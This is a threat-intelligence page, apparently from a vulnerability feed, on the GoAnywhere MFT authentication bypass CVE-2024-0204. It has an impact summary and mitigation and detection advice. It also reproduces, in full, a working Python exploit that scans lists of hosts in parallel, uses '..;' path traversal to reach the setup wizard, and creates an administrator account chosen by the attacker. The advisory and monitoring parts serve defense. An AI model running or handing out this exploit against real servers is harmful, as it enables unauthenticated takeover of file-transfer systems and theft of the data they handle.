Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
AI Analysis
Technical Summary
The Fortra GoAnywhere MFT 7.4.1 Authentication Bypass vulnerability (CVE-2024-0204) is a critical security flaw affecting versions prior to 7.4.1 of the GoAnywhere Managed File Transfer (MFT) software. This vulnerability arises from a path traversal weakness that allows unauthenticated attackers to bypass the authentication mechanism entirely. By exploiting this flaw, attackers can access the initial account setup wizard, which is normally only accessible during initial installation or configuration. This access enables them to create a new administrator account with arbitrary credentials without any prior authentication. The exploit leverages two distinct path traversal techniques to maximize success across different server configurations: one using the path "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" and the other "/goanywhere/..;/wizard/InitialAccountSetup.xhtml". The exploit script is implemented in Python 3 and uses the requests library to interact with the target server over HTTPS, bypassing SSL verification warnings. It first checks the target's vulnerability by sending GET requests to the crafted paths and analyzing HTTP response codes and content. If the target is vulnerable, it parses the response HTML to extract the required javax.faces.ViewState token, which is necessary for submitting the form to create an admin account. The script then submits a POST request with the attacker-supplied username and password to create the admin account. The vulnerability allows complete administrative control over the GoAnywhere MFT server, enabling attackers to manipulate file transfers, access sensitive data, and potentially pivot to other internal systems. The exploit requires no authentication or user interaction, making it highly dangerous. No official patch links are provided yet, but the vendor has released version 7.4.1 to address this issue. The exploit code is publicly available, increasing the risk of widespread exploitation once discovered.
Potential Impact
For European organizations using Fortra GoAnywhere MFT versions prior to 7.4.1, this vulnerability poses a severe risk. Successful exploitation grants attackers full administrative privileges, compromising confidentiality, integrity, and availability of managed file transfer operations. This can lead to unauthorized data exfiltration, injection of malicious files, disruption of critical file transfer workflows, and potential lateral movement within corporate networks. Organizations handling sensitive data such as financial records, personal data under GDPR, or intellectual property are particularly at risk. The ability to create an admin account without authentication means attackers can maintain persistent access and evade detection. Given the central role of MFT solutions in secure data exchange, exploitation could disrupt business continuity and lead to regulatory penalties. The lack of authentication and user interaction requirements means attacks can be automated and launched at scale, increasing the threat surface. European entities in sectors like finance, healthcare, government, and manufacturing that rely on GoAnywhere MFT are especially vulnerable to operational and reputational damage.
Mitigation Recommendations
1. Immediate upgrade to Fortra GoAnywhere MFT version 7.4.1 or later, where this vulnerability is patched, is the most effective mitigation. 2. If immediate patching is not feasible, restrict network access to the GoAnywhere MFT administrative interface using firewalls or network segmentation to limit exposure to trusted internal IPs only. 3. Monitor web server logs for suspicious access attempts to the paths "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" and "/goanywhere/..;/wizard/InitialAccountSetup.xhtml", which indicate exploitation attempts. 4. Implement Web Application Firewall (WAF) rules to detect and block path traversal patterns and unauthorized access to setup wizards. 5. Enforce strong authentication and multi-factor authentication (MFA) on administrative accounts once patched to reduce impact of compromised credentials. 6. Conduct regular audits of administrator accounts and review for any unauthorized accounts created. 7. Employ network intrusion detection systems (NIDS) with signatures for CVE-2024-0204 exploit patterns. 8. Educate IT and security teams about this vulnerability and ensure incident response plans include steps for rapid containment and remediation. 9. Disable or remove any unused or legacy setup wizards or interfaces if possible. 10. Use vulnerability scanning tools to identify any instances of vulnerable GoAnywhere MFT deployments within the organization.
Affected Countries
Germany, United Kingdom, France, Netherlands, Italy, Spain, Sweden, Belgium, Poland, Switzerland
Indicators of Compromise
- exploit-code: #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass # Date: 2025-05-25 # Exploit Author: @ibrahimsql # Exploit Author's github: https://github.com/ibrahimsql # Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft # Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial # Version: < 7.4.1 # Tested on: Kali Linux 2024.1 # CVE: CVE-2024-0204 # Description: # Fortra GoAnywhere MFT versions prior to 7.4.1 contain a critical authentication bypass vulnerability # that allows unauthenticated attackers to create an administrator account by exploiting a path traversal # vulnerability to access the initial account setup wizard. This exploit demonstrates two different # path traversal techniques to maximize successful exploitation across various server configurations. # # References: # - https://old.rapid7.com/blog/post/2024/01/23/etr-cve-2024-0204-critical-authentication-bypass-in-fortra-goanywhere-mft/ # - https://www.tenable.com/blog/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-vulnerability # - https://nvd.nist.gov/vuln/detail/cve-2024-0204 import argparse import concurrent.futures import os import socket import sys from typing import List, Dict, Tuple, Optional, Union import requests from bs4 import BeautifulSoup from colorama import Fore, Style, init # Initialize colorama for cross-platform colored output init(autoreset=True) # Disable SSL warnings requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Constants DEFAULT_TIMEOUT = 10 MAX_THREADS = 10 USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" PRIMARY_EXPLOIT_PATH = "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" SECONDARY_EXPLOIT_PATH = "/goanywhere/..;/wizard/InitialAccountSetup.xhtml" class Banner: @staticmethod def show(): banner = f"""{Fore.CYAN} ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔═████╗╚════██╗██╔═████╗██║ ██║ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗██║██╔██║ █████╔╝██║██╔██║███████║ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝████╔╝██║██╔═══╝ ████╔╝██║╚════██║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ╚██████╔╝███████╗╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═╝ {Style.RESET_ALL} {Fore.GREEN}CVE-2024-0204 Exploit v1.0{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql{Style.RESET_ALL} """ print(banner) class GoAnywhereExploit: def __init__(self, username: str, password: str, timeout: int = DEFAULT_TIMEOUT): self.username = username self.password = password self.timeout = timeout self.headers = {"User-Agent": USER_AGENT} self.vulnerable_targets = [] self.non_vulnerable_targets = [] self.error_targets = [] def check_target(self, target: str) -> Dict: """ Check if target is vulnerable to CVE-2024-0204 and attempt to create an admin account Args: target: The target URL/domain to check Returns: Dict containing result information """ result = { "target": target, "vulnerable": False, "message": "", "admin_created": False, "error": None } # Try primary exploit path first primary_result = self._try_exploit_path(target, PRIMARY_EXPLOIT_PATH) if primary_result["vulnerable"]: return primary_result # If primary path failed, try secondary exploit path print(f"{Fore.BLUE}[*] {Style.RESET_ALL}Primary exploit path failed, trying alternative path...") secondary_result = self._try_exploit_path(target, SECONDARY_EXPLOIT_PATH) if secondary_result["vulnerable"]: return secondary_result # If both paths failed, target is not vulnerable print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable to CVE-2024-0204") result["message"] = "Not vulnerable to CVE-2024-0204" self.non_vulnerable_targets.append(target) return result def _try_exploit_path(self, target: str, exploit_path: str) -> Dict: """ Try to exploit the target using a specific exploit path Args: target: Target to exploit exploit_path: Path to use for exploitation Returns: Dict with exploitation results """ result = { "target": target, "vulnerable": False, "message": "", "admin_created": False, "error": None } try: url = f"https://{target}{exploit_path}" session = requests.Session() # Initial check for vulnerability response = session.get( url, headers=self.headers, verify=False, timeout=self.timeout ) # Determine if target is vulnerable based on response if response.status_code == 401: print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Not vulnerable via {exploit_path} (401 Unauthorized)") result["message"] = "Not vulnerable (401 Unauthorized)" return result if response.status_code != 200: print(f"{Fore.YELLOW}[?] {Style.RESET_ALL}{target} - Unexpected response via {exploit_path} (Status: {response.status_code})") result["message"] = f"Unexpected response (Status: {response.status_code})" return result # Target is potentially vulnerable print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Potentially vulnerable via {exploit_path}!") result["vulnerable"] = True self.vulnerable_targets.append(target) # Extract ViewState token for the form submission try: soup = BeautifulSoup(response.text, "html.parser") view_state = soup.find('input', {'name': 'javax.faces.ViewState'}) if not view_state or not view_state.get('value'): print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Could not extract ViewState token via {exploit_path}") result["message"] = "Could not extract ViewState token" return result # Prepare data for admin account creation data = { "j_id_u:creteAdminGrid:username": self.username, "j_id_u:creteAdminGrid:password_hinput": self.password, "j_id_u:creteAdminGrid:password": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", "j_id_u:creteAdminGrid:confirmPassword_hinput": self.password, "j_id_u:creteAdminGrid:confirmPassword": "%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2%E2%80%A2", "j_id_u:creteAdminGrid:submitButton": "", "createAdminForm_SUBMIT": 1, "javax.faces.ViewState": view_state['value'] } # Attempt to create admin account create_response = session.post( url, headers=self.headers, data=data, verify=False, timeout=self.timeout ) if create_response.status_code == 200: print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{target} - Admin account created successfully via {exploit_path}! Username: {self.username}, Password: {self.password}") result["admin_created"] = True result["message"] = f"Admin account created successfully! Username: {self.username}, Password: {self.password}" else: print(f"{Fore.RED}[-] {Style.RESET_ALL}{target} - Failed to create admin account via {exploit_path} (Status: {create_response.status_code})") result["message"] = f"Failed to create admin account (Status: {create_response.status_code})" except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error extracting form data: {str(e)}") result["message"] = f"Error extracting form data: {str(e)}" result["error"] = str(e) except requests.exceptions.ConnectTimeout: print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection timeout") result["message"] = "Connection timeout" result["error"] = "Connection timeout" self.error_targets.append(target) except requests.exceptions.ConnectionError: print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}{target} - Connection error") result["message"] = "Connection error" result["error"] = "Connection error" self.error_targets.append(target) except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}{target} - Error: {str(e)}") result["message"] = f"Error: {str(e)}" result["error"] = str(e) self.error_targets.append(target) return result def scan_targets(self, targets: List[str]) -> None: """ Scan multiple targets concurrently Args: targets: List of targets to scan """ with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_THREADS) as executor: executor.map(self.check_target, targets) def load_targets_from_file(self, file_path: str) -> List[str]: """ Load targets from a file Args: file_path: Path to the file containing targets Returns: List of targets """ if not os.path.exists(file_path): print(f"{Fore.RED}[!] {Style.RESET_ALL}File not found: {file_path}") return [] try: with open(file_path, "r") as f: return [line.strip() for line in f if line.strip()] except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}Error reading file: {str(e)}") return [] def print_summary(self) -> None: """Print a summary of the scanning results""" print(f"\n{Fore.CYAN}[*] {Style.RESET_ALL}Scan Summary:") print(f"{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets: {len(self.vulnerable_targets)}") print(f"{Fore.RED}[-] {Style.RESET_ALL}Non-vulnerable targets: {len(self.non_vulnerable_targets)}") print(f"{Fore.YELLOW}[!] {Style.RESET_ALL}Error targets: {len(self.error_targets)}") if self.vulnerable_targets: print(f"\n{Fore.GREEN}[+] {Style.RESET_ALL}Vulnerable targets:") for target in self.vulnerable_targets: print(f" - {target}") def validate_args(args): """Validate command line arguments""" if not args.target and not args.file: print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify either a target (-t) or a file (-f)") return False if args.file and not os.path.exists(args.file): print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: File not found: {args.file}") return False if not args.username or not args.password: print(f"{Fore.RED}[!] {Style.RESET_ALL}Error: You must specify both username (-u) and password (-p)") return False return True def main(): """Main function""" parser = argparse.ArgumentParser(description="CVE-2024-0204: Fortra GoAnywhere MFT Authentication Bypass Exploit") parser.add_argument('-t', '--target', help="Target host to check (e.g., 'example.com' or '192.168.1.1')") parser.add_argument('-f', '--file', help="File containing targets, one per line") parser.add_argument('-u', '--username', help="Username for the admin account to create") parser.add_argument('-p', '--password', help="Password for the admin account to create") parser.add_argument('--timeout', type=int, default=DEFAULT_TIMEOUT, help=f"Connection timeout in seconds (default: {DEFAULT_TIMEOUT})") parser.add_argument('--threads', type=int, default=MAX_THREADS, help=f"Number of concurrent threads for scanning (default: {MAX_THREADS})") args = parser.parse_args() # Show banner Banner.show() # Validate arguments if not validate_args(args): parser.print_help() sys.exit(1) # Initialize exploit exploit = GoAnywhereExploit( username=args.username, password=args.password, timeout=args.timeout ) # Handle single target if args.target: print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Checking single target: {args.target}") exploit.check_target(args.target) # Handle targets from file elif args.file: targets = exploit.load_targets_from_file(args.file) if not targets: print(f"{Fore.RED}[!] {Style.RESET_ALL}No valid targets found in the file") sys.exit(1) print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Loaded {len(targets)} targets from file") print(f"{Fore.CYAN}[*] {Style.RESET_ALL}Starting scan with {args.threads} threads...\n") exploit.scan_targets(targets) # Print summary exploit.print_summary() if __name__ == "__main__": try: main() except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[!] {Style.RESET_ALL}Scan interrupted by user") sys.exit(0) except Exception as e: print(f"{Fore.RED}[!] {Style.RESET_ALL}Unhandled error: {str(e)}") sys.exit(1)
Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
Description
Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
AI-Powered Analysis
Technical Analysis
The Fortra GoAnywhere MFT 7.4.1 Authentication Bypass vulnerability (CVE-2024-0204) is a critical security flaw affecting versions prior to 7.4.1 of the GoAnywhere Managed File Transfer (MFT) software. This vulnerability arises from a path traversal weakness that allows unauthenticated attackers to bypass the authentication mechanism entirely. By exploiting this flaw, attackers can access the initial account setup wizard, which is normally only accessible during initial installation or configuration. This access enables them to create a new administrator account with arbitrary credentials without any prior authentication. The exploit leverages two distinct path traversal techniques to maximize success across different server configurations: one using the path "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" and the other "/goanywhere/..;/wizard/InitialAccountSetup.xhtml". The exploit script is implemented in Python 3 and uses the requests library to interact with the target server over HTTPS, bypassing SSL verification warnings. It first checks the target's vulnerability by sending GET requests to the crafted paths and analyzing HTTP response codes and content. If the target is vulnerable, it parses the response HTML to extract the required javax.faces.ViewState token, which is necessary for submitting the form to create an admin account. The script then submits a POST request with the attacker-supplied username and password to create the admin account. The vulnerability allows complete administrative control over the GoAnywhere MFT server, enabling attackers to manipulate file transfers, access sensitive data, and potentially pivot to other internal systems. The exploit requires no authentication or user interaction, making it highly dangerous. No official patch links are provided yet, but the vendor has released version 7.4.1 to address this issue. The exploit code is publicly available, increasing the risk of widespread exploitation once discovered.
Potential Impact
For European organizations using Fortra GoAnywhere MFT versions prior to 7.4.1, this vulnerability poses a severe risk. Successful exploitation grants attackers full administrative privileges, compromising confidentiality, integrity, and availability of managed file transfer operations. This can lead to unauthorized data exfiltration, injection of malicious files, disruption of critical file transfer workflows, and potential lateral movement within corporate networks. Organizations handling sensitive data such as financial records, personal data under GDPR, or intellectual property are particularly at risk. The ability to create an admin account without authentication means attackers can maintain persistent access and evade detection. Given the central role of MFT solutions in secure data exchange, exploitation could disrupt business continuity and lead to regulatory penalties. The lack of authentication and user interaction requirements means attacks can be automated and launched at scale, increasing the threat surface. European entities in sectors like finance, healthcare, government, and manufacturing that rely on GoAnywhere MFT are especially vulnerable to operational and reputational damage.
Mitigation Recommendations
1. Immediate upgrade to Fortra GoAnywhere MFT version 7.4.1 or later, where this vulnerability is patched, is the most effective mitigation. 2. If immediate patching is not feasible, restrict network access to the GoAnywhere MFT administrative interface using firewalls or network segmentation to limit exposure to trusted internal IPs only. 3. Monitor web server logs for suspicious access attempts to the paths "/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml" and "/goanywhere/..;/wizard/InitialAccountSetup.xhtml", which indicate exploitation attempts. 4. Implement Web Application Firewall (WAF) rules to detect and block path traversal patterns and unauthorized access to setup wizards. 5. Enforce strong authentication and multi-factor authentication (MFA) on administrative accounts once patched to reduce impact of compromised credentials. 6. Conduct regular audits of administrator accounts and review for any unauthorized accounts created. 7. Employ network intrusion detection systems (NIDS) with signatures for CVE-2024-0204 exploit patterns. 8. Educate IT and security teams about this vulnerability and ensure incident response plans include steps for rapid containment and remediation. 9. Disable or remove any unused or legacy setup wizards or interfaces if possible. 10. Use vulnerability scanning tools to identify any instances of vulnerable GoAnywhere MFT deployments within the organization.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52308
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass # Date: 2025-05-25 # Exploit Author: @ibrahimsql # Exploit Author's github: https://github.com/ibrahimsql # Vendor Homepage: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft # Software Link: https://www.fortra.com/products/secure-file-transfer/goanywhere-mft/free-trial # Version: < 7.4.1 # Tested on: Kali Linux 2024.1 # CVE: CVE-2024-0204 # Description: # Fortra
... (13921 more characters)
Threat ID: 68489d8b7e6d765d51d52927
Added to database: 6/10/2025, 9:03:07 PM
Last enriched: 6/11/2025, 9:16:03 PM
Last updated: 8/15/2025, 9:32:01 AM
Views: 21
Related Threats
Top Israeli Cybersecurity Director Arrested in US Child Exploitation Sting
HighEncryptHub abuses Brave Support in new campaign exploiting MSC EvilTwin flaw
MediumU.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumCisco ISE 3.0 - Remote Code Execution (RCE)
CriticalActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.